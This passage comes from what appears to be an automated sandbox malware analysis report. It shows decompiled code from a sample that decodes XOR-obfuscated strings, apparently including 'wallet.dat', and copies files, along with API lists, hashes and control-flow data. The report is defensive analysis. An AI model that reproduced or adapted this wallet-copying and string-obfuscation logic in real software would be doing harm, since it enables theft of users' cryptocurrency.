							 *((char*)(_t254 - 0x15)) = E00813174(0, _t254 - 0xa0, _t242);
							 *((char*)(_t254 - 4)) = 0xf;
							L0082DD77(_t254 - 0xa0);
							if( *((char*)(_t254 - 0x15)) == 0) {
								L27:
								 *((intOrPtr*)(_t254 - 4)) = 0xe;
								 *((char*)(_t254 - 0x14)) = 0;
								_push( *((intOrPtr*)(_t254 - 0x14)));
								L0082FEC9(_t254 - 0x70);
								 *((char*)(_t254 - 4)) = 0x13;
								E00813225(0, _t254 - 0x34, _t254 - 0x70, _t242); // executed
								L0082DD77(_t254 - 0x34);
								 *((intOrPtr*)(_t254 - 0x78)) = 0;
								_t142 =  >=  ?  *((void*)(_t254 - 0x88)) : _t254 - 0x88;
								 *( >=  ?  *((void*)(_t254 - 0x88)) : _t254 - 0x88) = 0;
								 *((intOrPtr*)(_t254 - 0x60)) = 0;
								_t144 =  >=  ?  *((void*)(_t254 - 0x70)) : _t254 - 0x70;
								 *( >=  ?  *((void*)(_t254 - 0x70)) : _t254 - 0x70) = 0;
								E0082DF41(_t254 - 0x88);
								_t146 = E0082DF41(_t254 - 0x70);
								 *[fs:0x0] =  *((intOrPtr*)(_t254 - 0xc));
								return _t146;
							}
							 *((char*)(_t254 - 0x14)) = 0;
							_push( *((intOrPtr*)(_t254 - 0x14)));
							L0082FEC9(_t254 - 0x70);
							 *((char*)(_t254 - 4)) = 0x11;
							E00813225(0, _t254 - 0xa0, _t254 - 0x70, _t242);
							 *((char*)(_t254 - 4)) = 0xf;
							L0082DD77(_t254 - 0xa0);
							_t215 =  >=  ?  *((void*)(_t254 - 0x70)) : _t254 - 0x70;
							_t151 =  >=  ?  *((void*)(_t254 - 0x88)) : _t254 - 0x88;
							if(CopyFileA( >=  ?  *((void*)(_t254 - 0x88)) : _t254 - 0x88, _t215, 0) == 0) {
								goto L27;
							}
							asm("movaps xmm0, [0x8a9220]");
							_t250 =  >=  ?  *((void*)(_t254 - 0x70)) : _t254 - 0x70;
							_t153 =  *0x8b5bc4; // 0x0
							asm("movups [ebp-0x58], xmm0");
							 *((intOrPtr*)(_t254 - 0x48)) = 0x724b5c41;
							 *((intOrPtr*)(_t254 - 0x44)) = 0x42424f59;
							 *((intOrPtr*)(_t254 - 0x40)) = 0x4a005a4b;
							 *((short*)(_t254 - 0x3c)) = 0x5a4f;
							 *((char*)(_t254 - 0x3a)) = 0x2e;
							if(_t153 >  *((intOrPtr*)(_t242 + 4))) {
								_t242 = 0x8b5bc4;
								E0086DB91(_t153, 0x8b5bc4);
								_t282 =  *0x8b5bc4 - 0xffffffff;
								_pop(_t215);
								if( *0x8b5bc4 == 0xffffffff) {
									E0082D1E6(0x8b4c24, _t254 - 0x58);
									L0086DFE8(0x8b4c24, _t282, 0x8959b5);
									L0086DB47(0x8b5bc4);
									_pop(_t215);
								}
							}
							if( *0x8b4c42 == 0) {
								L26:
								_push(_t215);
								_push(_t215);
								_t216 =  *0x8b4804; // 0x1346140
								E008183DF(_t216, 0x8b4c24, _t250);
								_t155 =  *0x8b4864; // 0x0
								_t156 = 1;
								_t218 =  ==  ? _t156 : _t155 & 0x000000ff;
								 *0x8b4864 =  ==  ? _t156 : _t155 & 0x000000ff;
								goto L27;
							} else {
								_t157 = 0;
								do {
									 *(_t157 + 0x8b4c24) =  *(_t157 + 0x8b4c24) ^ 0x0000002e;
									_t157 = _t157 + 1;
								} while (_t157 < 0x1f);
								goto L26;
							}
						} else {
							_t163 = 0;
							do {
								 *(_t163 + 0x8b4ea0) =  *(_t163 + 0x8b4ea0) ^ 0x0000002e;
								_t163 = _t163 + 1;
								_t275 = _t163 - 0x1d;
							} while (_t163 < 0x1d);
							goto L18;
						}
					} else {
						_t169 = 0;
						do {
							 *(_t169 + 0x8b4ca0) =  *(_t169 + 0x8b4ca0) ^ 0x0000002e;
							_t169 = _t169 + 1;
						} while (_t169 < 0xb);
						goto L12;
					}
				}
				_t173 = 0;
				do {
					 *(_t173 + 0x8b56c8) =  *(_t173 + 0x8b56c8) ^ 0x0000002e;
					_t173 = _t173 + 1;
				} while (_t173 < 0xc);
				goto L6;
			}
































                                    0x0081ddc0
                                    0x0081ddc5
                                    0x0081ddca
                                    0x0081ddd0
                                    0x0081ddd3
                                    0x0081dddb
                                    0x0081dde1
                                    0x0081dded
                                    0x0081ddee
                                    0x0081ddf1
                                    0x0081de0b
                                    0x0081de0e
                                    0x0081de16
                                    0x0081de23
                                    0x0081de33
                                    0x0081de3d
                                    0x0081de43
                                    0x0081de44
                                    0x0081de45
                                    0x0081de4c
                                    0x0081de4f
                                    0x0081de5a
                                    0x0081de65
                                    0x0081de70
                                    0x0081de7b
                                    0x0081de83
                                    0x0081de87
                                    0x0081de92
                                    0x0081de99
                                    0x0081dea0
                                    0x0081dea7
                                    0x0081dea9
                                    0x0081deae
                                    0x0081deb7
                                    0x0081debe
                                    0x0081dec3
                                    0x0081deca
                                    0x0081decb
                                    0x0081deda
                                    0x0081dedb
                                    0x0081dedc
                                    0x0081dedd
                                    0x0081dee2
                                    0x0081dee9
                                    0x0081deee
                                    0x0081def1
                                    0x0081decb
                                    0x0081def9
                                    0x0081df0a
                                    0x0081df0a
                                    0x0081df0f
                                    0x0081df16
                                    0x0081df1d
                                    0x0081df23
                                    0x0081df2d
                                    0x0081df34
                                    0x0081df39
                                    0x0081df40
                                    0x0081df41
                                    0x0081df50
                                    0x0081df51
                                    0x0081df52
                                    0x0081df54
                                    0x0081df55
                                    0x0081df5a
                                    0x0081df61
                                    0x0081df66
                                    0x0081df69
                                    0x0081df41
                                    0x0081df71
                                    0x0081df82
                                    0x0081df82
                                    0x0081df87
                                    0x0081df8f
                                    0x0081df94
                                    0x0081df98
                                    0x0081df9f
                                    0x0081dfa4
                                    0x0081dfa8
                                    0x0081dfaf
                                    0x0081dfb6
                                    0x0081dfbd
                                    0x0081dfc7
                                    0x0081dfcf
                                    0x0081dfd4
                                    0x0081dfdc
                                    0x0081dfe7
                                    0x0081dff1
                                    0x0081dff7
                                    0x0081dffd
                                    0x0081dfdc
                                    0x0081e005
                                    0x0081e016
                                    0x0081e020
                                    0x0081e02a
                                    0x0081e034
                                    0x0081e040
                                    0x0081e04a
                                    0x0081e058
                                    0x0081e05d
                                    0x0081e067
                                    0x0081e070
                                    0x0081e073
                                    0x0081e07f
                                    0x0081e08e
                                    0x0081e091
                                    0x0081e095
                                    0x0081e09e
                                    0x0081e1c9
                                    0x0081e1c9
                                    0x0081e1d3
                                    0x0081e1d9
                                    0x0081e1dc
                                    0x0081e1e5
                                    0x0081e1e9
                                    0x0081e1f1
                                    0x0081e200
                                    0x0081e209
                                    0x0081e210
                                    0x0081e219
                                    0x0081e21c
                                    0x0081e220
                                    0x0081e222
                                    0x0081e22a
                                    0x0081e234
                                    0x0081e23d
                                    0x0081e23d
                                    0x0081e0a4
                                    0x0081e0aa
                                    0x0081e0b3
                                    0x0081e0bf
                                    0x0081e0c3
                                    0x0081e0ce
                                    0x0081e0d2
                                    0x0081e0df
                                    0x0081e0ee
                                    0x0081e0fe
                                    0x00000000
                                    0x00000000
                                    0x0081e10b
                                    0x0081e112
                                    0x0081e116
                                    0x0081e11b
                                    0x0081e11f
                                    0x0081e126
                                    0x0081e12d
                                    0x0081e134
                                    0x0081e13a
                                    0x0081e144
                                    0x0081e146
                                    0x0081e14c
                                    0x0081e151
                                    0x0081e158
                                    0x0081e159
                                    0x0081e164
                                    0x0081e16e
                                    0x0081e174
                                    0x0081e17a
                                    0x0081e17a
                                    0x0081e159
                                    0x0081e182
                                    0x0081e193
                                    0x0081e193
                                    0x0081e194
                                    0x0081e195
                                    0x0081e1a1
                                    0x0081e1a6
                                    0x0081e1b5
                                    0x0081e1b6
                                    0x0081e1b9
                                    0x00000000
                                    0x0081e184
                                    0x0081e184
                                    0x0081e186
                                    0x0081e186
                                    0x0081e18d
                                    0x0081e18e
                                    0x00000000
                                    0x0081e186
                                    0x0081e007
                                    0x0081e007
                                    0x0081e009
                                    0x0081e009
                                    0x0081e010
                                    0x0081e011
                                    0x0081e011
                                    0x00000000
                                    0x0081e009
                                    0x0081df73
                                    0x0081df73
                                    0x0081df75
                                    0x0081df75
                                    0x0081df7c
                                    0x0081df7d
                                    0x00000000
                                    0x0081df75
                                    0x0081df71
                                    0x0081defb
                                    0x0081defd
                                    0x0081defd
                                    0x0081df04
                                    0x0081df05
                                    0x00000000

                                    APIs
                                      • Part of subcall function 0082DF41: _Deallocate.LIBCONCRT ref: 0082DF50
                                      • Part of subcall function 0086DB91: EnterCriticalSection.KERNEL32(008B3CAC,?,74714EE0,?,0081416B,008B54D0,00000000), ref: 0086DB9C
                                      • Part of subcall function 0086DB91: LeaveCriticalSection.KERNEL32(008B3CAC,?,0081416B,008B54D0,00000000), ref: 0086DBD9
                                    • CopyFileA.KERNEL32(?,?,00000000), ref: 0081E0F6
                                      • Part of subcall function 0086DB47: EnterCriticalSection.KERNEL32(008B3CAC,69494B7C,?,00814193,008B54D0,0089549D,?,74714EE0,00000000), ref: 0086DB51
                                      • Part of subcall function 0086DB47: LeaveCriticalSection.KERNEL32(008B3CAC,?,00814193,008B54D0,0089549D,?,74714EE0,00000000), ref: 0086DB84
                                      • Part of subcall function 0086DB47: RtlWakeAllConditionVariable.NTDLL ref: 0086DBFB
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.320073655.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                    • Associated: 00000000.00000002.320060165.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320358841.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320502317.00000000008B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320530346.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_810000_qRsw2oZH24.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CriticalSection$EnterLeave$ConditionCopyDeallocateFileVariableWake
                                    • String ID: .$.$A\Kr$JOZ.$KZ$OZ$YOBB$rYOBBKZJOZ.
                                    • API String ID: 265086031-2949469555
                                    • Opcode ID: b4dfbfaee4ba335f322587d345ba8da3920495ca6a879801e9c7166bfc55a1a1
                                    • Instruction ID: 72dfb4909f4a3cce33207870c6d28a54b950d1d6949a9ab98da561a8733761c2
                                    • Opcode Fuzzy Hash: b4dfbfaee4ba335f322587d345ba8da3920495ca6a879801e9c7166bfc55a1a1
                                    • Instruction Fuzzy Hash: B7C1DF30904398DEDB15EBA8E942BDDBBB0FF15310F644198E055FB293DBB45A89CB12
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0081F68F Relevance: 14.3, APIs: 1, Strings: 7, Instructions: 296fileCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 2844 81f68f-81f786 call 890cfc call 818f5d * 2 call 82e8c7 call 82fa3b call 82e917 call 82fa3b call 82df41 * 5 2869 81f7c1-81f7c8 2844->2869 2870 81f788-81f79a call 86db91 2844->2870 2872 81f7d9-81f7fc 2869->2872 2873 81f7ca 2869->2873 2870->2869 2878 81f79c-81f7c0 call 86dfe8 call 86db47 2870->2878 2876 81f839-81f840 2872->2876 2877 81f7fe-81f810 call 86db91 2872->2877 2875 81f7cc-81f7d7 2873->2875 2875->2872 2875->2875 2879 81f851-81f89c call 82da74 2876->2879 2880 81f842 2876->2880 2877->2876 2888 81f812-81f838 call 86dfe8 call 86db47 2877->2888 2878->2869 2890 81f8d3-81f8da 2879->2890 2891 81f89e-81f8b1 call 86db91 2879->2891 2883 81f844-81f84f 2880->2883 2883->2879 2883->2883 2888->2876 2894 81f8eb-81f973 call 82da74 call 82bb72 call 82e917 call 82df41 call 82fec9 call 813174 call 82dd77 2890->2894 2895 81f8dc 2890->2895 2891->2890 2904 81f8b3-81f8d2 call 82d1e6 call 86dfe8 call 86db47 2891->2904 2923 81fa94-81fab4 call 82fec9 call 813225 2894->2923 2924 81f979-81f9d3 call 82fec9 call 813225 call 82dd77 CopyFileA 2894->2924 2899 81f8de-81f8e9 2895->2899 2899->2894 2899->2899 2904->2890 2931 81fab9-81fb08 call 82dd77 call 82df41 * 2 2923->2931 2924->2923 2938 81f9d9-81fa0f 2924->2938 2940 81fa11-81fa24 call 86db91 2938->2940 2941 81fa46-81fa4d 2938->2941 2940->2941 2950 81fa26-81fa45 call 82d5ef call 86dfe8 call 86db47 2940->2950 2943 81fa4f 2941->2943 2944 81fa5e-81fa8a call 8183df 2941->2944 2947 81fa51-81fa5c 2943->2947 2944->2923 2947->2944 2947->2947 2950->2941
                                    C-Code - Quality: 74%
                                    			E0081F68F(void* __ebx, void* __ecx, void* __edx, void* __eflags) {
				void* __edi;
				void* _t113;
				void* _t116;
				void* _t118;
				intOrPtr _t126;
				intOrPtr _t127;
				intOrPtr _t129;
				void* _t131;
				void* _t145;
				signed char _t154;
				void* _t155;
				int _t156;
				int _t162;
				int _t168;
				int _t172;
				CHAR* _t214;
				intOrPtr _t215;
				void* _t224;
				void* _t226;
				void* _t229;
				void* _t230;
				void* _t240;
				intOrPtr* _t241;
				void* _t249;
				void* _t253;
				void* _t255;
				intOrPtr* _t256;
				void* _t262;

				_t262 = __eflags;
				L00890CFC(0x89299b, __ebx, __ecx, __edx);
				_t256 = _t255 - 0xf4;
				_push(__ebx);
				 *((intOrPtr*)(_t253 - 0x10)) = _t256;
				_t229 = 8;
				_t240 = L00818F5D(__ebx, _t253 - 0x68, _t229);
				_t230 = 4;
				 *((intOrPtr*)(_t253 - 4)) = 0;
				_t113 = L00818F5D(0, _t253 - 0xe8, _t230);
				 *((char*)(_t253 - 4)) = 1;
				_t116 = E0082E8C7(0, _t253 - 0xd0, 0x8b2a8c, _t240);
				 *((char*)(_t253 - 4)) = 2;
				E0082FA3B(_t253 - 0x9c,  *((intOrPtr*)(_t253 - 0x14)), _t116, _t113, "\\");
				 *((char*)(_t253 - 4)) = 3;
				_t118 = E0082E917(_t253 - 0xb8, _t253 - 0x9c, _t262, ".");
				_push(_t240);
				_push(_t118);
				 *((char*)(_t253 - 4)) = 4;
				_push( *((intOrPtr*)(_t253 - 0x14)));
				E0082FA3B(_t253 - 0x50);
				E0082DF41(_t253 - 0xb8);
				E0082DF41(_t253 - 0x9c);
				E0082DF41(_t253 - 0xd0);
				E0082DF41(_t253 - 0xe8);
				 *((char*)(_t253 - 4)) = 0xa;
				E0082DF41(_t253 - 0x68);
				 *((intOrPtr*)(_t253 - 0x28)) = 0x424f5972;
				 *((intOrPtr*)(_t253 - 0x24)) = 0x5a4b42;
				 *((intOrPtr*)(_t253 - 0x20)) = 0x2e5a4f4a;
				_t241 =  *((intOrPtr*)( *[fs:0x2c]));
				_t126 =  *0x8b5c54; // 0x80000049
				 *((intOrPtr*)(_t253 - 0x14)) = _t241;
				if(_t126 >  *((intOrPtr*)(_t241 + 4))) {
					E0086DB91(_t126, 0x8b5c54);
					_t264 =  *0x8b5c54 - 0xffffffff;
					_pop(_t226);
					if( *0x8b5c54 == 0xffffffff) {
						asm("movsd");
						asm("movsd");
						asm("movsd");
						L0086DFE8(_t226, _t264, 0x895aad);
						 *_t256 = 0x8b5c54;
						L0086DB47();
						_t241 =  *((intOrPtr*)(_t253 - 0x14));
					}
				}
				if( *0x8b4b3f == 0) {
					L6:
					_t127 =  *0x8b5014; // 0x8000004a
					 *((intOrPtr*)(_t253 - 0x24)) = 0x6a5c5a5d;
					 *((intOrPtr*)(_t253 - 0x20)) = 0x6a4f5a4f;
					 *((short*)(_t253 - 0x1c)) = 0x5c47;
					 *((char*)(_t253 - 0x1a)) = 0x2e;
					if(_t127 >  *((intOrPtr*)(_t241 + 4))) {
						E0086DB91(_t127, 0x8b5014);
						_t268 =  *0x8b5014 - 0xffffffff;
						_pop(_t224);
						if( *0x8b5014 == 0xffffffff) {
							asm("movsd");
							asm("movsd");
							asm("movsw");
							asm("movsb");
							L0086DFE8(_t224, _t268, 0x895aba);
							 *_t256 = 0x8b5014;
							L0086DB47();
							_t241 =  *((intOrPtr*)(_t253 - 0x14));
						}
					}
					if( *0x8b5db6 == 0) {
						L12:
						_t257 = _t256 - 0x18;
						 *((intOrPtr*)(_t253 - 0x14)) = _t256 - 0x18;
						E0082DA74(_t257, 0x8b5dac);
						 *((char*)(_t253 - 4)) = 0xb;
						asm("movaps xmm0, [0x8a8db0]");
						_t129 =  *0x8b5b60; // 0x8000004b
						asm("movups [ebp-0x38], xmm0");
						 *((intOrPtr*)(_t253 - 0x28)) = 0x62724047;
						 *((intOrPtr*)(_t253 - 0x24)) = 0x4d4b5a47;
						 *((intOrPtr*)(_t253 - 0x20)) = 0x3404741;
						 *((short*)(_t253 - 0x1c)) = 0x5a7f;
						 *((char*)(_t253 - 0x1a)) = 0x2e;
						if(_t129 >  *((intOrPtr*)(_t241 + 4))) {
							E0086DB91(_t129, 0x8b5b60);
							_t272 =  *0x8b5b60 - 0xffffffff;
							if( *0x8b5b60 == 0xffffffff) {
								E0082D1E6(0x8b5578, _t253 - 0x38);
								L0086DFE8(0x8b5578, _t272, 0x895ac9);
								L0086DB47(0x8b5b60);
							}
						}
						if( *0x8b5596 == 0) {
							L18:
							E0082DA74(_t257 - 0x18, 0x8b5578);
							 *((char*)(_t253 - 4)) = 0xa;
							_t131 = E0082BB72(0, _t253 - 0x100, 0x80000001); // executed
							 *((char*)(_t253 - 4)) = 0xc;
							E0082E917(_t253 - 0x84, _t131, _t274, 0x8b4b34);
							E0082DF41(_t253 - 0x100);
							 *((char*)(_t253 - 4)) = 0xf;
							 *((char*)(_t253 - 0x14)) = 0;
							_push( *((intOrPtr*)(_t253 - 0x14)));
							L0082FEC9(_t253 - 0x84);
							 *((char*)(_t253 - 4)) = 0x10;
							 *((char*)(_t253 - 0x15)) = E00813174(0, _t253 - 0x9c, _t241);
							 *((char*)(_t253 - 4)) = 0xf;
							L0082DD77(_t253 - 0x9c);
							if( *((char*)(_t253 - 0x15)) == 0) {
								L27:
								 *((intOrPtr*)(_t253 - 4)) = 0xe;
								 *((char*)(_t253 - 0x14)) = 0;
								_push( *((intOrPtr*)(_t253 - 0x14)));
								L0082FEC9(_t253 - 0x50);
								 *((char*)(_t253 - 4)) = 0x13;
								E00813225(0, _t253 - 0x34, _t253 - 0x50, _t241); // executed
								L0082DD77(_t253 - 0x34);
								 *((intOrPtr*)(_t253 - 0x74)) = 0;
								_t141 =  >=  ?  *((void*)(_t253 - 0x84)) : _t253 - 0x84;
								 *( >=  ?  *((void*)(_t253 - 0x84)) : _t253 - 0x84) = 0;
								 *((intOrPtr*)(_t253 - 0x40)) = 0;
								_t143 =  >=  ?  *((void*)(_t253 - 0x50)) : _t253 - 0x50;
								 *( >=  ?  *((void*)(_t253 - 0x50)) : _t253 - 0x50) = 0;
								E0082DF41(_t253 - 0x84);
								_t145 = E0082DF41(_t253 - 0x50);
								 *[fs:0x0] =  *((intOrPtr*)(_t253 - 0xc));
								return _t145;
							}
							 *((char*)(_t253 - 0x14)) = 0;
							_push( *((intOrPtr*)(_t253 - 0x14)));
							L0082FEC9(_t253 - 0x50);
							 *((char*)(_t253 - 4)) = 0x11;
							E00813225(0, _t253 - 0x9c, _t253 - 0x50, _t241);
							 *((char*)(_t253 - 4)) = 0xf;
							L0082DD77(_t253 - 0x9c);
							_t214 =  >=  ?  *((void*)(_t253 - 0x50)) : _t253 - 0x50;
							_t150 =  >=  ?  *((void*)(_t253 - 0x84)) : _t253 - 0x84;
							if(CopyFileA( >=  ?  *((void*)(_t253 - 0x84)) : _t253 - 0x84, _t214, 0) == 0) {
								goto L27;
							}
							asm("movaps xmm0, [0x8a8d50]");
							_t249 =  >=  ?  *((void*)(_t253 - 0x50)) : _t253 - 0x50;
							_t152 =  *0x8b617c;
							asm("movups [ebp-0x6c], xmm0");
							 *((intOrPtr*)(_t253 - 0x5c)) = 0x424f5972;
							 *((intOrPtr*)(_t253 - 0x58)) = 0x5a4b42;
							 *((intOrPtr*)(_t253 - 0x54)) = 0x2e5a4f4a;
							if( *0x8b617c >  *((intOrPtr*)(_t241 + 4))) {
								_t241 = 0x8b617c;
								E0086DB91(_t152, 0x8b617c);
								_t281 =  *0x8b617c - 0xffffffff;
								_pop(_t214);
								if( *0x8b617c == 0xffffffff) {
									E0082D5EF(0x8b4c54, _t253 - 0x6c);
									L0086DFE8(0x8b4c54, _t281, 0x895a9e);
									L0086DB47(0x8b617c);
									_pop(_t214);
								}
							}
							if( *0x8b4c6f == 0) {
								L26:
								_push(_t214);
								_push(_t214);
								_t215 =  *0x8b4804; // 0x1346140
								E008183DF(_t215, 0x8b4c54, _t249);
								_t154 =  *0x8b4866; // 0x0
								_t155 = 1;
								_t217 =  ==  ? _t155 : _t154 & 0x000000ff;
								 *0x8b4866 =  ==  ? _t155 : _t154 & 0x000000ff;
								goto L27;
							} else {
								_t156 = 0;
								do {
									 *(_t156 + 0x8b4c54) =  *(_t156 + 0x8b4c54) ^ 0x0000002e;
									_t156 = _t156 + 1;
								} while (_t156 < 0x1c);
								goto L26;
							}
						} else {
							_t162 = 0;
							do {
								 *(_t162 + 0x8b5578) =  *(_t162 + 0x8b5578) ^ 0x0000002e;
								_t162 = _t162 + 1;
								_t274 = _t162 - 0x1f;
							} while (_t162 < 0x1f);
							goto L18;
						}
					} else {
						_t168 = 0;
						do {
							 *(_t168 + 0x8b5dac) =  *(_t168 + 0x8b5dac) ^ 0x0000002e;
							_t168 = _t168 + 1;
						} while (_t168 < 0xb);
						goto L12;
					}
				}
				_t172 = 0;
				do {
					 *(_t172 + 0x8b4b34) =  *(_t172 + 0x8b4b34) ^ 0x0000002e;
					_t172 = _t172 + 1;
				} while (_t172 < 0xc);
				goto L6;
			}































                                    0x0081f68f
                                    0x0081f694
                                    0x0081f699
                                    0x0081f69f
                                    0x0081f6a2
                                    0x0081f6aa
                                    0x0081f6b0
                                    0x0081f6bc
                                    0x0081f6bd
                                    0x0081f6c0
                                    0x0081f6da
                                    0x0081f6dd
                                    0x0081f6e5
                                    0x0081f6f2
                                    0x0081f702
                                    0x0081f70c
                                    0x0081f712
                                    0x0081f713
                                    0x0081f714
                                    0x0081f71b
                                    0x0081f71e
                                    0x0081f729
                                    0x0081f734
                                    0x0081f73f
                                    0x0081f74a
                                    0x0081f752
                                    0x0081f756
                                    0x0081f761
                                    0x0081f768
                                    0x0081f76f
                                    0x0081f776
                                    0x0081f778
                                    0x0081f77d
                                    0x0081f786
                                    0x0081f78d
                                    0x0081f792
                                    0x0081f799
                                    0x0081f79a
                                    0x0081f7a9
                                    0x0081f7aa
                                    0x0081f7ab
                                    0x0081f7ac
                                    0x0081f7b1
                                    0x0081f7b8
                                    0x0081f7bd
                                    0x0081f7c0
                                    0x0081f79a
                                    0x0081f7c8
                                    0x0081f7d9
                                    0x0081f7d9
                                    0x0081f7de
                                    0x0081f7e5
                                    0x0081f7ec
                                    0x0081f7f2
                                    0x0081f7fc
                                    0x0081f803
                                    0x0081f808
                                    0x0081f80f
                                    0x0081f810
                                    0x0081f81f
                                    0x0081f820
                                    0x0081f821
                                    0x0081f823
                                    0x0081f824
                                    0x0081f829
                                    0x0081f830
                                    0x0081f835
                                    0x0081f838
                                    0x0081f810
                                    0x0081f840
                                    0x0081f851
                                    0x0081f851
                                    0x0081f856
                                    0x0081f85e
                                    0x0081f863
                                    0x0081f867
                                    0x0081f86e
                                    0x0081f873
                                    0x0081f877
                                    0x0081f87e
                                    0x0081f885
                                    0x0081f88c
                                    0x0081f892
                                    0x0081f89c
                                    0x0081f8a4
                                    0x0081f8a9
                                    0x0081f8b1
                                    0x0081f8bc
                                    0x0081f8c6
                                    0x0081f8cc
                                    0x0081f8d2
                                    0x0081f8b1
                                    0x0081f8da
                                    0x0081f8eb
                                    0x0081f8f5
                                    0x0081f8ff
                                    0x0081f909
                                    0x0081f915
                                    0x0081f91f
                                    0x0081f92d
                                    0x0081f932
                                    0x0081f93c
                                    0x0081f945
                                    0x0081f948
                                    0x0081f954
                                    0x0081f963
                                    0x0081f966
                                    0x0081f96a
                                    0x0081f973
                                    0x0081fa94
                                    0x0081fa94
                                    0x0081fa9e
                                    0x0081faa4
                                    0x0081faa7
                                    0x0081fab0
                                    0x0081fab4
                                    0x0081fabc
                                    0x0081facb
                                    0x0081fad4
                                    0x0081fadb
                                    0x0081fae4
                                    0x0081fae7
                                    0x0081faeb
                                    0x0081faed
                                    0x0081faf5
                                    0x0081faff
                                    0x0081fb08
                                    0x0081fb08
                                    0x0081f979
                                    0x0081f97f
                                    0x0081f988
                                    0x0081f994
                                    0x0081f998
                                    0x0081f9a3
                                    0x0081f9a7
                                    0x0081f9b4
                                    0x0081f9c3
                                    0x0081f9d3
                                    0x00000000
                                    0x00000000
                                    0x0081f9e0
                                    0x0081f9e7
                                    0x0081f9eb
                                    0x0081f9f0
                                    0x0081f9f4
                                    0x0081f9fb
                                    0x0081fa02
                                    0x0081fa0f
                                    0x0081fa11
                                    0x0081fa17
                                    0x0081fa1c
                                    0x0081fa23
                                    0x0081fa24
                                    0x0081fa2f
                                    0x0081fa39
                                    0x0081fa3f
                                    0x0081fa45
                                    0x0081fa45
                                    0x0081fa24
                                    0x0081fa4d
                                    0x0081fa5e
                                    0x0081fa5e
                                    0x0081fa5f
                                    0x0081fa60
                                    0x0081fa6c
                                    0x0081fa71
                                    0x0081fa80
                                    0x0081fa81
                                    0x0081fa84
                                    0x00000000
                                    0x0081fa4f
                                    0x0081fa4f
                                    0x0081fa51
                                    0x0081fa51
                                    0x0081fa58
                                    0x0081fa59
                                    0x00000000
                                    0x0081fa51
                                    0x0081f8dc
                                    0x0081f8dc
                                    0x0081f8de
                                    0x0081f8de
                                    0x0081f8e5
                                    0x0081f8e6
                                    0x0081f8e6
                                    0x00000000
                                    0x0081f8de
                                    0x0081f842
                                    0x0081f842
                                    0x0081f844
                                    0x0081f844
                                    0x0081f84b
                                    0x0081f84c
                                    0x00000000
                                    0x0081f844
                                    0x0081f840
                                    0x0081f7ca
                                    0x0081f7cc
                                    0x0081f7cc
                                    0x0081f7d3
                                    0x0081f7d4
                                    0x00000000

                                    APIs
                                      • Part of subcall function 0082DF41: _Deallocate.LIBCONCRT ref: 0082DF50
                                      • Part of subcall function 0086DB91: EnterCriticalSection.KERNEL32(008B3CAC,?,74714EE0,?,0081416B,008B54D0,00000000), ref: 0086DB9C
                                      • Part of subcall function 0086DB91: LeaveCriticalSection.KERNEL32(008B3CAC,?,0081416B,008B54D0,00000000), ref: 0086DBD9
                                    • CopyFileA.KERNEL32(?,?,00000000), ref: 0081F9CB
                                      • Part of subcall function 0086DB47: EnterCriticalSection.KERNEL32(008B3CAC,69494B7C,?,00814193,008B54D0,0089549D,?,74714EE0,00000000), ref: 0086DB51
                                      • Part of subcall function 0086DB47: LeaveCriticalSection.KERNEL32(008B3CAC,?,00814193,008B54D0,0089549D,?,74714EE0,00000000), ref: 0086DB84
                                      • Part of subcall function 0086DB47: RtlWakeAllConditionVariable.NTDLL ref: 0086DBFB
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.320073655.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                    • Associated: 00000000.00000002.320060165.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320358841.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320502317.00000000008B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320530346.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_810000_qRsw2oZH24.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CriticalSection$EnterLeave$ConditionCopyDeallocateFileVariableWake
                                    • String ID: .$BKZ$G\$JOZ.$JOZ.$rYOB$rYOBBKZJOZ.
                                    • API String ID: 265086031-3370317137
                                    • Opcode ID: 2e372cd04ec71760d83110c97a92e176108671dba6bd81b64f390883f5114143
                                    • Instruction ID: 97db60bf34ff03960c6f40f28a33e2864deb0ade10e5da889d573f6ac1791639
                                    • Opcode Fuzzy Hash: 2e372cd04ec71760d83110c97a92e176108671dba6bd81b64f390883f5114143
                                    • Instruction Fuzzy Hash: 55C1E130D00298DECF15EBA8D946BDDBBB0FF15310F1441A9E555BB293DB741A88CB22
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0082C44A Relevance: 14.3, APIs: 6, Strings: 2, Instructions: 295networkCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
